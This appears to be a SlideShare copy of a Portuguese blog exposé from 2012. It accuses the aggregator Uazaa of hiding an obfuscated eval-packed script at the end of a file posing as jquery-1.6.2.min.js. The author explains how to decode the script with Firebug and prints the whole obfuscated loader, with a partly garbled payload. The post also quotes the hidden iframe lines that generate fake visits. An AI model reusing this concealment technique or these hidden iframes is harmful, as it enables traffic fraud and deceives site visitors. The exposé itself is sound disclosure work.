SlideShare una empresa de Scribd logo
1 de 4
Descargar para leer sin conexión
UAZAAA - Farsa Parte II

Depois da nossa primeira denúncia, o pessoal deste agregador tirou o código criptografado que ficava no arquivo
jquery-1.6.2.min.js (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js)

Quem não viu dá uma olhada em http://www.slideshare.net/devninjabr/uazaa-uma-farsa que explico a técnica.

Hoje dei uma olhada novamente e vi que ele continua utilizando a fraude.

Desta vez ele utilizou uma forma de criptografia que envolve a função EVAL do javascript e juntamente com uma
criptografia em hexadecimal.

O código se encontra ao final do arquivo (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js) que como
disse na Parte I, é um arquivo acima de qualquer suspeita, por se tratar de um arquivo encontrado em quase todos
os blogs...

Apenas para curiosidade, o código encontrado ao final do arquivo é este:
eval(function (p, a, c, k, e, d)
{
    e = function (c)
    {
        return (c < a ? '' : e(c / a)) + String.fromCharCode(c % a + 161);
    };
    if (!''.replace(/^/, String))
    {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function (e)
        {
            return d[e]
        }];
        e = function ()
        {
            return '[xa1-xff]+';
        };
        c = 1;
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp(e(c), 'g'), k[c]);
        }
    }
    return p
}
('¢¦ ¶=["£à ¤£¿¤°«®«§«µ«¨«Â¥à ¨¹£¿¤§¥à £³¤§¢§®Ã-
©©ó¨¤£Ö¤§Ø®¥¥¥É¤¤§¹§¢®¥¢¤£ÓãÂ-
Ç£ð¤§ÉªÈ¥ó§Ç£ß¤£Ê¥¥Ã¸£Û¤ï©©Ç£°¤ØñØ«£Â-
¥¥à £»¤§à à ¥Â¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹Â£¿¤¨¥à £³ÔÂ-
¨ÀÃÀ¸¨¹£¿¤¥à £³©¦¦Êɩø§¹£Ã¸£»¤§à à ¥£Û¤µÂ§À¥
°¹°Ç£°¤£âԣ䤩¦¦½©É¨¤§¥É©¦¦½©«©Ä©¥«µÂ§À¥¸£³Ô
°Ã¤©é¤Ó¤°«®«§«µ«¨«Â¥à ¨¹Ó¤§¥à Ö
Ô§Ç줮¥Ã¸Õ¤ï¦©¦©ÇܤØñث륥à Ú¤§à à ¥Â-
¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹ÂÓ¤¨¥à ÖÔ¨ÀÃÀ¸¨¹Ó¤¥à Ö
¦©¦¦¦¦Êɦ©Ã¸§¹£Ã¸Ú¤§à à ¥Õ¤µÂ§À¥°¹°ÇܤèÔ夦©¦
¦¦¦½¦©É¨¤§¥É¦©¦¦¦¦½¦©«¦©Ä¦©¥«µÂ§À¥¸Ö
԰䦩äÇߤ⤦¦¦©¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢
»¢®¢®¢ª¢Ñ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢
¨¢Å¢£¢Â-
¢±¢¬¢¯¢³¢Ì¢Ê¢¨¢¯¢¯¢£¢ª¢»¢ª¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢
¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢
Å¢¾¢¿¢ð¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢»¢®¢®¢ª¢Ñ
¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢¨¢Å¢£¢Â-
¢±¢¬¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢
º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢Å¢¾¢¿¦¦¦©¥¥¸¦©«à «à «¦©ê
¡ò¡ø¡ü¡ô¡ÿ¡ç¡á¡þ¡¢¡¡ý¡ú¡ö¡õ¡÷¡£²¡££¡£ª¡£±¡£¾
¡£¼¡£¬¡£¯¡£Å¡£È¡£®¡£½¡£§¡£Ì¡£¨¡£Î¡£Ä¡£Ñ¡£º¡
£Ù¡£µ¦©Ç£Æ¤¦©¡¦©¥«²«à Ã¥¥©«£·«£à «©¡¡¡¡¡¡¡¡¡¡¡
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡£¿¡£³¡£Ê¡£°¡£Û¡£»¡
£Â-
¡£â¡£ä¡£à ¡£ß¡£Ü¡£Õ¡£Ú¡£ë¡£è¡ª¯¡£å¡£é¡£ì¡£ê¡
£ò¡£ø¡£ü¡£ô¡£ÿ¡£ç¡£á¡£þ¡£¢¡¡£ý¡£ú¡ª²¡£ö¡£õ¡£
÷¡ª£¡ªª¡£·¡ª±¡ª¾¡ª¼¡ª¬¡ªÅ¡ª®¡ª½¡ª§¡£Ò©Ç£Ò¤©¡
©¥«²«à Ã¥¥","¡","à °Æº·","¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡Â
¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡ÃŽÃ’³§·º»³¡Â¨·Ò³¡ÊѺƨ¡Â-
¨°Æ®§¨¡ºÎ¡á·Âº³Ä¡¨ß®Æ¡¬ª¡à °Æº·¡·»á·Â-
º³Ä¡±¬¡³¨Ê¡ç¨ÄÕⰡλ¿à Ñ®Âà »Ì¨¡±¼¡°®Â-
à ¨å³·¡Å¾¡¬£¡ªÕ¡¯²¡¯ª¡¬¼¡ªÚ¡¬¬¡¬Ü¡¯±¡¯¾¡¬È¡¯
¯¡¬±¡¬Ú¡±à ¡±Ü¡±Ó¡¬Õ¡¬à ¡¯È¡±Õ¡¯¼¡¬Å¡¡¬¯¡¯Å¡¯Ó
¡¬¾¡±Ö¡Êº·¨¡¡¬Ö¡¡Ò³¨à §®°¨¡Ì»§Ò¿¨³·¡²Ó","","ÃŽÂ-
»¿à Ñ®Âà »Ì¨","¨°Æ®§¨","¦ÊÉ","¦½","Ä"];¢¢(Þ(à ,ã,´,×
,Ë,æ){Ë=Þ(´){à (´<ã?¶[4]:Ë(¢£(´/ã)))+((´=´%ã)>¢¥?ù[¶[5]](´+¢®):´.¢Â(¢«))};î(!¶[4][¶[6]](/^/,ù)){û(´--){æ[Ë(´)]=×[´]||Ë(´)};×
=[Þ(Ë){à æ[Ë]}];Ë=Þ(){à ¶[7]};´=1};û(´--){î(×[´]){à =à [¶[6]](¢ª ¢©(¶[8]+Ë(´)+¶[8],¶[9]),×
[´])}};à à }(¶[0],¢¨,¢¬,¶[3][¶[2]](¶[1]),0,{}));',
95, 109, 'x7C|x25|x31|x28|x29|x5C|x63|x65|x27|x32|x2C|x36|x72|x61|x37|x70|x33|x30|x6E|_0x1c28x3|x6B|_0x3d99|x74|x3B|x3D|x69|x6F|x35|x62|x34|x6D|x5D|x7B|x5B|x7D|x67|x38|x6C|x2
E|x39|x2B|x77|_0x1c28x5|x64|x43|x66|x2D|x73|x68|x75|x41|x20|x45|x42|_0x1c28x4|x2F|x6A|x46|x71|x44|return|function|x76|_0x1c28x1|x53|x78|_0x1c28x2|x79|x49|_0x1c28x6|x52|x48|x4
A|x4C|x47|x4B|x3F|if|x21|x7A|x5E|x4D|x3A|x50|x59|x58|x5A|x4E|String|x57|while|x4F|x56|x54|x51|x55|eval|parseInt|x3E|35|var|x3C|62|RegExp|new|36|137|toString|29'.split('|'),
0, {}))
Com este caracteres estranhos não entendemos nada, não é mesmo ? Desta forma, quando visualizamos o código
fonte da página, ninguém consegue entender o que este código faz.

Bom amigo blogueiro, agora vou explicar para vocês, uma forma para verificar se algum site está utilizando de
artimanhas para mandar visitas.

Existe um plugin do Firefox que se chama Firebug (http://firebug.softonic.com.br/download)

Ele é uma ferramenta que ajuda os programadores na hora de desenvolver sites. Uma das inúmeras funcionalidades
dele é mostrar como seria o código fonte, independente se o cara criptografou...

Vamos agora ao exemplo, usando o nosso Agregador Favorito.

Vamos direto ao arquivo do trambique: o dos Widgets... http://www.uazaa.xpg.com.br/widgets/250x250.php




Ativamos o Firebug e...

Aparece o código fonte já descriptografado...

Tcham tcham tcham tcham!!!!
Achamos os IFRAMES.... ☺

Explicando o método:

Uma das exigências de parceria do Uazaa é a utilização do widget em todos os blogs parceiros. Desta forma, quando
alguém acessa o seu blog, TODO acesso gera um acesso à página inicial do uazaa e também um acesso falso para
algum blogueiro (geralmente os que ficam no topo durante o dia).

O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/fuckoff.php">
gera um link aleatório para que o uazaa mande visitas para algum blogueiro. (Experimente acessar
http://www.uazaa.xpg.com.br/fuckoff.php que toda vez é um site diferente)

PS: Logo após a denúncia, ele alterou o nome do script para:

http://www.uazaa.com.br/newRed.php (atualização feita em 14/01/2012)
O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/">
Gera um acesso para a home do uazaa...

Por exemplo: Se vc tiver 50 online no seu blog, o widget será carregado 50 vezes... e automaticamente será
contado + 50 acessos na home do uazaa... E de quebra o uazaa manda visitas falsas para 50 blogs.




Tá dado o recado...

13/01/2012

@devninjaBR

Más contenido relacionado

La actualidad más candente

How to deploy node to production
How to deploy node to productionHow to deploy node to production
How to deploy node to production
Sean Hess
 
If love is_blind_-_tiffany
If love is_blind_-_tiffanyIf love is_blind_-_tiffany
If love is_blind_-_tiffany
tenka
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Tatsuhiko Miyagawa
 
Assurer - a pluggable server testing/monitoring framework
Assurer - a pluggable server testing/monitoring frameworkAssurer - a pluggable server testing/monitoring framework
Assurer - a pluggable server testing/monitoring framework
Gosuke Miyashita
 
Testing of javacript
Testing of javacriptTesting of javacript
Testing of javacript
Lei Kang
 

La actualidad más candente (20)

Laravel 4 package development
Laravel 4 package developmentLaravel 4 package development
Laravel 4 package development
 
groovy & grails - lecture 9
groovy & grails - lecture 9groovy & grails - lecture 9
groovy & grails - lecture 9
 
Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014
 
Search and play more than 50 clips
Search and play more than 50 clipsSearch and play more than 50 clips
Search and play more than 50 clips
 
How to deploy node to production
How to deploy node to productionHow to deploy node to production
How to deploy node to production
 
Continuous testing In PHP
Continuous testing In PHPContinuous testing In PHP
Continuous testing In PHP
 
Perlbal Tutorial
Perlbal TutorialPerlbal Tutorial
Perlbal Tutorial
 
If love is_blind_-_tiffany
If love is_blind_-_tiffanyIf love is_blind_-_tiffany
If love is_blind_-_tiffany
 
Con-FESS 2015 - Having Fun With Javassist
Con-FESS 2015 - Having Fun With JavassistCon-FESS 2015 - Having Fun With Javassist
Con-FESS 2015 - Having Fun With Javassist
 
groovy & grails - lecture 6
groovy & grails - lecture 6groovy & grails - lecture 6
groovy & grails - lecture 6
 
Your code are my tests
Your code are my testsYour code are my tests
Your code are my tests
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
 
Oredev 2015 - Taming Java Agents
Oredev 2015 - Taming Java AgentsOredev 2015 - Taming Java Agents
Oredev 2015 - Taming Java Agents
 
Elixir on Containers
Elixir on ContainersElixir on Containers
Elixir on Containers
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
 
Assurer - a pluggable server testing/monitoring framework
Assurer - a pluggable server testing/monitoring frameworkAssurer - a pluggable server testing/monitoring framework
Assurer - a pluggable server testing/monitoring framework
 
Testing ASP.net Web Applications using Ruby
Testing ASP.net Web Applications using RubyTesting ASP.net Web Applications using Ruby
Testing ASP.net Web Applications using Ruby
 
Building Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSocketsBuilding Realtime Apps with Ember.js and WebSockets
Building Realtime Apps with Ember.js and WebSockets
 
groovy & grails - lecture 10
groovy & grails - lecture 10groovy & grails - lecture 10
groovy & grails - lecture 10
 
Testing of javacript
Testing of javacriptTesting of javacript
Testing of javacript
 

Destacado (10)

Twentyten
TwentytenTwentyten
Twentyten
 
Guia de trabajo
Guia de trabajoGuia de trabajo
Guia de trabajo
 
1550 sites
1550 sites1550 sites
1550 sites
 
Sesión benéfica Cirque du Soleil
Sesión benéfica Cirque du SoleilSesión benéfica Cirque du Soleil
Sesión benéfica Cirque du Soleil
 
Menuanaid
MenuanaidMenuanaid
Menuanaid
 
Notes from the Pit
Notes from the PitNotes from the Pit
Notes from the Pit
 
Daily VTR Trades
Daily VTR TradesDaily VTR Trades
Daily VTR Trades
 
Slideshareweb2
Slideshareweb2Slideshareweb2
Slideshareweb2
 
LIGHTKEN - Tutorial: Google for Webmasters
LIGHTKEN - Tutorial: Google for WebmastersLIGHTKEN - Tutorial: Google for Webmasters
LIGHTKEN - Tutorial: Google for Webmasters
 
PACO. 2º PARTE
PACO. 2º PARTEPACO. 2º PARTE
PACO. 2º PARTE
 

Similar a Uazaa uma-farsa-parte 2

Compatibility Detector Tool of Chrome extensions
Compatibility Detector Tool of Chrome extensionsCompatibility Detector Tool of Chrome extensions
Compatibility Detector Tool of Chrome extensions
Kai Cui
 
Plack perl superglue for web frameworks and servers
Plack perl superglue for web frameworks and serversPlack perl superglue for web frameworks and servers
Plack perl superglue for web frameworks and servers
Tatsuhiko Miyagawa
 
Exploiting the newer perl to improve your plugins
Exploiting the newer perl to improve your pluginsExploiting the newer perl to improve your plugins
Exploiting the newer perl to improve your plugins
Marian Marinov
 
How and why i roll my own node.js framework
How and why i roll my own node.js frameworkHow and why i roll my own node.js framework
How and why i roll my own node.js framework
Ben Lin
 
Ratpack - Classy and Compact Groovy Web Apps
Ratpack - Classy and Compact Groovy Web AppsRatpack - Classy and Compact Groovy Web Apps
Ratpack - Classy and Compact Groovy Web Apps
James Williams
 

Similar a Uazaa uma-farsa-parte 2 (20)

Compatibility Detector Tool of Chrome extensions
Compatibility Detector Tool of Chrome extensionsCompatibility Detector Tool of Chrome extensions
Compatibility Detector Tool of Chrome extensions
 
Protractor framework architecture with example
Protractor framework architecture with exampleProtractor framework architecture with example
Protractor framework architecture with example
 
Cross Domain Web
Mashups with JQuery and Google App Engine
Cross Domain Web
Mashups with JQuery and Google App EngineCross Domain Web
Mashups with JQuery and Google App Engine
Cross Domain Web
Mashups with JQuery and Google App Engine
 
Chromium Embedded Framework + Go at Brooklyn JS
Chromium Embedded Framework + Go at Brooklyn JSChromium Embedded Framework + Go at Brooklyn JS
Chromium Embedded Framework + Go at Brooklyn JS
 
Plack perl superglue for web frameworks and servers
Plack perl superglue for web frameworks and serversPlack perl superglue for web frameworks and servers
Plack perl superglue for web frameworks and servers
 
SXSW: Even Faster Web Sites
SXSW: Even Faster Web SitesSXSW: Even Faster Web Sites
SXSW: Even Faster Web Sites
 
Quality Use Of Plugin
Quality Use Of PluginQuality Use Of Plugin
Quality Use Of Plugin
 
WebGL: GPU acceleration for the open web
WebGL: GPU acceleration for the open webWebGL: GPU acceleration for the open web
WebGL: GPU acceleration for the open web
 
AppengineJS
AppengineJSAppengineJS
AppengineJS
 
Django + Vue, JavaScript de 3ª generación para modernizar Django
Django + Vue, JavaScript de 3ª generación para modernizar DjangoDjango + Vue, JavaScript de 3ª generación para modernizar Django
Django + Vue, JavaScript de 3ª generación para modernizar Django
 
Xopus Application Framework
Xopus Application FrameworkXopus Application Framework
Xopus Application Framework
 
Bonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node jsBonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node js
 
Exploiting the newer perl to improve your plugins
Exploiting the newer perl to improve your pluginsExploiting the newer perl to improve your plugins
Exploiting the newer perl to improve your plugins
 
Art & music vs Google App Engine
Art & music vs Google App EngineArt & music vs Google App Engine
Art & music vs Google App Engine
 
Add new commands in appium 2.0
Add new commands in appium 2.0Add new commands in appium 2.0
Add new commands in appium 2.0
 
Hackazon realistic e-commerce Hack platform
Hackazon realistic e-commerce Hack platformHackazon realistic e-commerce Hack platform
Hackazon realistic e-commerce Hack platform
 
And the Greatest of These Is ... Rack Support
And the Greatest of These Is ... Rack SupportAnd the Greatest of These Is ... Rack Support
And the Greatest of These Is ... Rack Support
 
RichFaces - Testing on Mobile Devices
RichFaces - Testing on Mobile DevicesRichFaces - Testing on Mobile Devices
RichFaces - Testing on Mobile Devices
 
How and why i roll my own node.js framework
How and why i roll my own node.js frameworkHow and why i roll my own node.js framework
How and why i roll my own node.js framework
 
Ratpack - Classy and Compact Groovy Web Apps
Ratpack - Classy and Compact Groovy Web AppsRatpack - Classy and Compact Groovy Web Apps
Ratpack - Classy and Compact Groovy Web Apps
 

Último

Último (20)

Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 

Uazaa uma-farsa-parte 2

  • 1. UAZAAA - Farsa Parte II Depois da nossa primeira denúncia, o pessoal deste agregador tirou o código criptografado que ficava no arquivo jquery-1.6.2.min.js (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js) Quem não viu dá uma olhada em http://www.slideshare.net/devninjabr/uazaa-uma-farsa que explico a técnica. Hoje dei uma olhada novamente e vi que ele continua utilizando a fraude. Desta vez ele utilizou uma forma de criptografia que envolve a função EVAL do javascript e juntamente com uma criptografia em hexadecimal. O código se encontra ao final do arquivo (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js) que como disse na Parte I, é um arquivo acima de qualquer suspeita, por se tratar de um arquivo encontrado em quase todos os blogs... Apenas para curiosidade, o código encontrado ao final do arquivo é este: eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(c / a)) + String.fromCharCode(c % a + 161); }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '[xa1-xff]+'; }; c = 1; }; while (c--) { if (k[c]) { p = p.replace(new RegExp(e(c), 'g'), k[c]); } } return p } ('¢¦ ¶=["£à ¤£¿¤°«®«§«µ«¨«Â¥à ¨¹£¿¤§¥à £³¤§¢§®Ã- ©©ó¨¤£Ö¤§Ø®¥¥¥É¤¤§¹§¢®¥¢¤£ÓãÂ- Ç£ð¤§ÉªÈ¥ó§Ç£ß¤£Ê¥¥Ã¸£Û¤ï©©Ç£°¤ØñØ«£Â- ¥¥à £»¤§à à ¥Â¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹Â£¿¤¨¥à £³ÔÂ- ¨ÀÃÀ¸¨¹£¿¤¥à £³©¦¦Êɩø§¹£Ã¸£»¤§à à ¥£Û¤µÂ§À¥ °¹°Ç£°¤£âԣ䤩¦¦½©É¨¤§¥É©¦¦½©«©Ä©¥«µÂ§À¥¸£³Ô °Ã¤©é¤Ó¤°«®«§«µ«¨«Â¥à ¨¹Ó¤§¥à Ö Ô§Ç줮¥Ã¸Õ¤ï¦©¦©ÇܤØñث륥à Ú¤§à à ¥Â- ¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹ÂÓ¤¨¥à ÖÔ¨ÀÃÀ¸¨¹Ó¤¥à Ö ¦©¦¦¦¦Êɦ©Ã¸§¹£Ã¸Ú¤§à à ¥Õ¤µÂ§À¥°¹°ÇܤèÔ夦©¦ ¦¦¦½¦©É¨¤§¥É¦©¦¦¦¦½¦©«¦©Ä¦©¥«µÂ§À¥¸Ö ԰䦩äÇߤ⤦¦¦©¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢ »¢®¢®¢ª¢Ñ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢ ¨¢Å¢£¢Â- ¢±¢¬¢¯¢³¢Ì¢Ê¢¨¢¯¢¯¢£¢ª¢»¢ª¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢ ¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢ Å¢¾¢¿¢ð¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢»¢®¢®¢ª¢Ñ ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢¨¢Å¢£¢Â- ¢±¢¬¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢ º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢Å¢¾¢¿¦¦¦©¥¥¸¦©«à «à «¦©ê ¡ò¡ø¡ü¡ô¡ÿ¡ç¡á¡þ¡¢¡¡ý¡ú¡ö¡õ¡÷¡£²¡££¡£ª¡£±¡£¾ ¡£¼¡£¬¡£¯¡£Å¡£È¡£®¡£½¡£§¡£Ì¡£¨¡£Î¡£Ä¡£Ñ¡£º¡ £Ù¡£µ¦©Ç£Æ¤¦©¡¦©¥«²«à Ã¥¥©«£·«£à «©¡¡¡¡¡¡¡¡¡¡¡ ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡£¿¡£³¡£Ê¡£°¡£Û¡£»¡ £Â- ¡£â¡£ä¡£à ¡£ß¡£Ü¡£Õ¡£Ú¡£ë¡£è¡ª¯¡£å¡£é¡£ì¡£ê¡ £ò¡£ø¡£ü¡£ô¡£ÿ¡£ç¡£á¡£þ¡£¢¡¡£ý¡£ú¡ª²¡£ö¡£õ¡£ ÷¡ª£¡ªª¡£·¡ª±¡ª¾¡ª¼¡ª¬¡ªÅ¡ª®¡ª½¡ª§¡£Ò©Ç£Ò¤©¡ ©¥«²«à Ã¥¥","¡","à °Æº·","¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ ¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡ÃŽÃ’³§·º»³¡Â¨·Ò³¡ÊѺƨ¡Â- ¨°Æ®§¨¡ºÎ¡á·Âº³Ä¡¨ß®Æ¡¬ª¡à °Æº·¡·»á·Â- º³Ä¡±¬¡³¨Ê¡ç¨ÄÕⰡλ¿à Ñ®Âà »Ì¨¡±¼¡°®Â- à ¨å³·¡Å¾¡¬£¡ªÕ¡¯²¡¯ª¡¬¼¡ªÚ¡¬¬¡¬Ü¡¯±¡¯¾¡¬È¡¯ ¯¡¬±¡¬Ú¡±à ¡±Ü¡±Ó¡¬Õ¡¬à ¡¯È¡±Õ¡¯¼¡¬Å¡¡¬¯¡¯Å¡¯Ó ¡¬¾¡±Ö¡Êº·¨¡¡¬Ö¡¡Ò³¨à §®°¨¡Ì»§Ò¿¨³·¡²Ó","","ÃŽÂ- »¿à Ñ®Âà »Ì¨","¨°Æ®§¨","¦ÊÉ","¦½","Ä"];¢¢(Þ(à ,ã,´,× ,Ë,æ){Ë=Þ(´){à (´<ã?¶[4]:Ë(¢£(´/ã)))+((´=´%ã)>¢¥?ù[¶[5]](´+¢®):´.¢Â(¢«))};î(!¶[4][¶[6]](/^/,ù)){û(´--){æ[Ë(´)]=×[´]||Ë(´)};× =[Þ(Ë){à æ[Ë]}];Ë=Þ(){à ¶[7]};´=1};û(´--){î(×[´]){à =à [¶[6]](¢ª ¢©(¶[8]+Ë(´)+¶[8],¶[9]),× [´])}};à à }(¶[0],¢¨,¢¬,¶[3][¶[2]](¶[1]),0,{}));', 95, 109, 'x7C|x25|x31|x28|x29|x5C|x63|x65|x27|x32|x2C|x36|x72|x61|x37|x70|x33|x30|x6E|_0x1c28x3|x6B|_0x3d99|x74|x3B|x3D|x69|x6F|x35|x62|x34|x6D|x5D|x7B|x5B|x7D|x67|x38|x6C|x2 E|x39|x2B|x77|_0x1c28x5|x64|x43|x66|x2D|x73|x68|x75|x41|x20|x45|x42|_0x1c28x4|x2F|x6A|x46|x71|x44|return|function|x76|_0x1c28x1|x53|x78|_0x1c28x2|x79|x49|_0x1c28x6|x52|x48|x4 A|x4C|x47|x4B|x3F|if|x21|x7A|x5E|x4D|x3A|x50|x59|x58|x5A|x4E|String|x57|while|x4F|x56|x54|x51|x55|eval|parseInt|x3E|35|var|x3C|62|RegExp|new|36|137|toString|29'.split('|'), 0, {}))
